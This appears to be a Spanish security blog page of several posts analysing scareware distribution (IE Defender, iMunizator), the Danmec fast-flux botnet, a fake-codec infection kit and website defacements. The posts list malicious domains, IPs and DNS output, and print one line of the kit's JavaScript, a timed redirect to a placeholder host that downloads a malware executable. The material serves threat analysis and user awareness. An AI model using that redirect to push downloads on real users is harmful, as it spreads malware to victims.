Nueva estrategia de IS para diseminar scareware

IE Defender es uno más de los tantos falsos programas de seguridad (scareware, también llamados rogue) que constantemente bombardean a los usuarios con intenciones de infectar sus equipos a través de sitios web que simulan ser legítimos.

Sin embargo, se están detectando nuevas estrategias de diseminación y engaño que no comparten la misma metodología de descarga desde el mismo sitio web del scareware, pero que buscan engañar a los usuarios para lograr sus objetivos; en este caso, IE Defender se está diseminado a través de sitios web que prometen la descarga de música en formato mp3 y películas.

En ninguno de los casos, se descarga el disco o película prometido sino que se descarga alguna de las variantes que componen la familia de IE Defender.

Todas las páginas utilizadas para propagar la amenaza comparten la misma dirección IP (216.240.151.112) de descarga:

free-games-rapidshare .com
movie-rapidshare .com
moviesrapidshare .org
music-rapidshare .com
musicrapidshare .org
warez-catalog .com
movie-megaupload .com
cpmusicpub .com
soft-rapidshare .net
softrapidshare .com
softrapidshare .org
ftp-warez .org
extra-turbo .com
softupdate09 .com
cpmusicpub .com
free-full .com
free-full-download.com
free-full-rapidshare.com

Un detalle no menor que identifica a estos sitios maliciosos, es que casi todos simulan ser páginas alojadas en sitios que permiten almacenar archivos como Megaupload, Rapidshare o, directamente, sitios diseñados para descargar warez.

Información relacionada:
Una recorrida por los últimos scarewawe
Una recorrida por los últimos scarewawe II

# pistus

Ver más

Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs

Danmec, o Asprox, es el nombre de un troyano diseñado para reclutar máquinas zombies al tiempo que recolecta información confidencial de cada una de las víctimas que infecta.

Si bien la aparición de este troyano no es reciente, actualmente se vale de estrategias más complejas que las habitualmente utilizadas por otros códigos maliciosos, incluso por sus primeras variantes, como las técnicas Fast-Flux para evitar la detección por parte de programas de bloqueo e infectar la mayor cantidad de equipos posibles.

Actualmente, las redes Fast-Flux son explotadas masivamente y de manera activa por miles de dominios de origen Ruso, activando nuevamente botnets como la creada por Danmec.

google-analitycs.lijg .ru
fmkopswuzhj .biz
fnygfr .com
fvwugekf .info
fwkbt .info
gbrpn .org
gbxpxugx .org
ghtileh .biz
gnyluuxneo .com
fuougcdv .org
www. dbrgf .ru
www. bnmd .kz
www. nvepe .ru
www. mtno .ru
www. wmpd .ru
www. msngk6 .ru
www. vjhdo .com
www. aspx37 .me
google-analitycs.dbrgf .ru
www. advabnr .com
www. lijg .ru
www. dft6s .kz

Cada uno de estos dominios aloja el siguiente script, escrito en JavaScript, llamado script.js (MD5: ccec2c026a38ce139c16ae97065ccd91), desde el cual ejecuta un Drive-by-Download:

Esta llamada a través de la etiqueta iframe, es realizada a una URL que forma parte activa de una red Fast-Flux.

;google-analitycs.lijg.ru. IN A

;; ANSWER SECTION:
google-analitycs.lijg.ru. 600 IN A 68.119.39.129
google-analitycs.lijg.ru. 600 IN A 69.176.46.57
google-analitycs.lijg.ru. 600 IN A 71.12.89.233
google-analitycs.lijg.ru. 600 IN A 76.73.237.59
google-analitycs.lijg.ru. 600 IN A 97.104.40.246
google-analitycs.lijg.ru. 600 IN A 98.194.180.179
google-analitycs.lijg.ru. 600 IN A 146.57.249.100
google-analitycs.lijg.ru. 600 IN A 151.118.186.131
google-analitycs.lijg.ru. 600 IN A 165.166.236.74
google-analitycs.lijg.ru. 600 IN A 173.16.99.131
google-analitycs.lijg.ru. 600 IN A 173.17.180.79
google-analitycs.lijg.ru. 600 IN A 24.107.209.119
google-analitycs.lijg.ru. 600 IN A 24.170.188.201
google-analitycs.lijg.ru. 600 IN A 68.93.61.194

;; AUTHORITY SECTION:
lijg.ru. 339897 IN NS ns3.lijg.ru.
lijg.ru. 339897 IN NS ns2.lijg.ru.
lijg.ru. 339897 IN NS ns1.lijg.ru.
lijg.ru. 339897 IN NS ns5.lijg.ru.
lijg.ru. 339897 IN NS ns4.lijg.ru.

;; Query time: 263 msec
;; SERVER: 192.168.240.2#53(192.168.240.2)
;; WHEN: Sun Jan 25 20:31:57 2009
;; MSG SIZE rcvd: 356

Al mismo tiempo que cada una de las direcciones web líneas arriba expuestas forman una nueva granja de redes Fast-Flux con grupos de direcciones IP espejadas.

Fast-Flux es una técnica avanzada utilizada con fines maliciosos, de manera conjunta con otras, para la propagación de diferentes amenazas. Esto obliga a ser cautelosos en todo momento.

# pistus

Ver más

Técnicas de engaño que no pasan de moda

¿Somos hijos del rigor?

Una de las cuestiones que a diario motiva alguna reflexión es por qué los usuarios siguen cayendo en trampas ya por demás conocidas.

Técnicas de Ingeniería Social como la doble extensión en los archivos, espacios entre el nombre del archivo y la extensión y, desde que se comenzó a utilizar Internet como plataforma de ataque, técnicas como los falsos códecs son una pequeña muestra de algunas de ellas.

Los sitios web que alojan material pornográfico suelen ser los más visitados en Internet y, también, los más utilizados por los diseminadores de malware para propagar amenazas. Y por más que nos preguntemos cómo puede ser posible que todavía los usuarios sigan infectando sus equipos a través de estas estrategias de engaño, la respuesta parecería recaer en algo tan simple de justificar como "un alto porcentaje de demanda" por el consumo de dicho material, como uno de los más buscados.

Los creadores de malware saben muy bien que la cosa es así, y que la persona que visita un sitio pornográfico, quiere ver pornografía, sin importar el formato con el cual se presente el recurso (video y/o imagen); en consecuencia, si a ese usuario se le ofrece la descarga de uno, e incluso varios, falsos códecs para poder visualizar el supuesto video, lo más probable es que, en la mayoría de los casos, el usuario los descargue.

Entonces, verán en pantalla algo similar a lo mostrado en la captura, que al pasar unos segundos mostrará una ventana pop-ups parecida a la siguiente:

El usuario, pensando que se trata de un códec necesario para la visualización del video, lo instala. En realidad, lo que instala es un malware, hasta el día de la fecha detectado sólo por algunas compañías antivirus.

Por otro lado, existe un aplicativo contituido tan sólo por un archivo HTML que es utilizado para propagar masivamente y a través de cualquier medio este tipo de acciones.

El aplicativo no permite crear ni modificar códigos maliciosos sino que permite la diseminación de los mismos a través del clásico modo mencionado. El único requerimiento es alojar en un servidor (o en cualquier zombie PC) el archivo HTML y especificar en su código la dirección de descarga del malware en la siguiente porción de código.

window.setTimeout("location.href='http://servidor.com/archivo.exe'", 1000);

Como componentes adicionales, el kit propone redirigir también hacia la visualización de un video real. Esto es parte de la estrategia de Ingeniería Social y busca despejar alguna sospecha por parte del usuario.

Ya no hablamos sólo de técnicas como Drive-by-Download, exploit, scripting. ofuscación de código, entre tantos otros, sino que hablamos de cautela y sentido común.

Es decir, no alcanza con sólo confiar la seguridad ante los peligros que representan los códigos maliciosos a soluciones antivirus ya que, en este caso y según el reporte de VT, actualmente los AV nos ofrecen sólo un 35.09% de protección donde sólo 14 de 39 detectan la amenaza, el otro 64.91% dependerá netamente de nuestra habilidad y sentido común para detectar una potencial actividad maliciosa.

# pistus

Ver más

Atacando sistemas Mac a través de falsa herramienta de seguridad

¿Quién dijo que todo era para windows?

Si bien es cierto que la masividad de las diferentes técnicas de engaño e infección son extremadamente más comunes en plataformas Windows, la seguridad es competencia de cualquier sistema, sin importar su infraestructura ni plataforma, por lo que también existen amenazas del tipo rogue (también llamado scareware) para sistemas Mac.

En este caso, la reciente falsa herramienta de seguridad llamada iMunizator (en realidad no es tan reciente ;-P ya que sus primeros pasos los dio durante el año 2007 y principios del 2008, sin embargo volvió a la “carga” nuevamente), puede ser descargada desde diferentes sitios web que responden a una sola dirección IP (67.205.75.10) alojada en Ucrania, en una empresa de web hosting llamada iWeb Technologies Inc.

www. imunizator .com
www. imunizator .net
imunizator .com
imunizator .net
mac-imunizator .net

Este programa malicioso comparte "espacio web" con otros rogue mucho más conocidos a través de la IP 70.38.19.203:

Antispyware Deluxe (antispywaredeluxe .com)
Antivirus 2009 (antivirus-2009-pro .net)
Antivirus 2010 (av2010 .net)
Vista Antivirus 2008 (vav-2008 .net)

iMunizator viene desplegando sus estrategias de engaño desde hace un tiempo, cambiando de dominios para reflotar, incluso cambiando su nombre (anteriormente llamado MacSweeper).

Un dato más que interesante es que las acciones de transferencia de fondos para poder “comprar” la falsa herramienta se realiza a través de una compañía de e-commerce llamada Plimus, completamente legal de origen israelí pero con oficinas centralizadas en EEUU (San Diego y Silicon Valley) y en Ucrania. Es por ello que los usuarios verán en la barra de dirección el protocolo seguro HTTPS presente en toda recomendación, además de otras pautas que pretenden dar seguridad demostrando que estamos operando desde un sitio confiable.

El malware actual busca constantemente obtener información sensible de los usuarios para cometer fraudes donde un alto porcentaje de propagación lo sufren plataformas windows; sin embargo, esto supone que los creadores de malware están virando la mira hacia nuevos objetivos. En consecuencia, hay que manejar las mismas buenas prácticas de seguridad sin importar la tecnología a la cual se aplique.

Información relacionada:
Una recorrida por los últimos scarewawe
Una recorrida por los últimos scarewawe II

# pistus

Ver más

Desfiguración de sitios web III

Websites defacement three

El número de sitios web vulnerados por defacers es día a día verdaderamente alto y toma mayor repercusión cuando es realizado en repudio de determinados actos como los acontecidos recientemente en la franja de gaza.

Algunos de los defacing reportados durante los últimos 15 días responden dicho acontecimiento.

Websites defacement two

Desfiguración histórica

Defacing realizado el 26 de junio de 1999 contra el sitio web del Programa de Investigación en Microgravedad de la NASA.
Información de la época sobre el proyecto

Ref.: # 00003h
Defacer: keebler elves

# pistus

Ver más